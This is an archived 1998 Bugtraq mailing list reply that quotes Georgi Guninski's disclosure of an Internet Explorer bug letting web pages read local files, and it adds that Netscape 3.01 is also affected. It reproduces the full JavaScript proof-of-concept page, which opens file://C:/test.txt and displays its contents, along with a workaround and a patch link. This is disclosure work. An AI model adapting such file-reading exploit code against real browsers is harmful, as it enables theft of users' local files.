Bugtraq mailing list archives
Re: IE can read local files
From: robing () TOTAL NET (Mike Dion)
Date: Sat, 5 Sep 1998 13:36:29 +0200
Netscape Navigator Version 3.01 is vulnerable too... I didn't test any other netscape versions... At 04:33 98-09-05 -0400, Georgi Guninski wrote:
There is a bug in Internet Explorer 3, 4.0, 4.01 (for version information
see Microsoft's info below),
which allows a specially designed web page to read text or HTML files from
the user's computer
and send their contents to an arbitrary host, even if the user is behind
firewall. The bug uses Javascript and
the file name and location must be known. Another way to exploit this bug is to send a specially designed message to
an Outlook Express/IE4 user.
Demonstration of this is available at:
http://www.geocities.com/ResearchTriangle/1711/good-read.html
Workaround: Disable Javascript. Microsoft has released a patch at:
http://www.microsoft.com/security/bulletins/ms98-013.htm
Georgi Guninski http://www.geocities.com/ResearchTriangle/1711 The source of the page: ----Cut here--- <HTML> <HEAD><TITLE>Read text/HTML file with Internet Explorer 4.01></TITLE></HEAD> <BODY> This demonstrates a bug in IE 4.01 under Windows 95 (don't know for other
versions), which allows reading text or HTML file on the user's machine.
<B>Create the file c:\test.txt</B> and its contents are shown in a message
box. The file may be sent to an arbitrary server even if behind a firewall.
<BR> To test it, you need Javascript enabled. <BR> This file is created by <A
HREF=http://www.geocities.com/ResearchTriangle/1711>Georgi Guninski.</A>
<SCRIPT LANGUAGE="JAVASCRIPT"> alert("This page demonstrates reading the file C:\\test.txt (you may need
to create a short file to view it)");
var x=window.open('file://C:/test.txt'); x.navigate("javascript:eval(\"var
a=window.open('file://C:/test.txt');r=a.document.body.innerText;alert(r);\") ");
</SCRIPT> </BODY> </HTML> ____________________________________________________________________ Get free e-mail and a permanent address at http://www.netaddress.com/?N=1
Current thread:
- IE can read local files Georgi Guninski (Sep 05)
- <Possible follow-ups>
- Re: IE can read local files Mike Dion (Sep 05)
- Re: IE can read local files Lynda L. True (Sep 05)
- Re: IE can read local files Steve Moyzis (Sep 05)
- Re: IE can read local files Thomas Davis (Sep 08)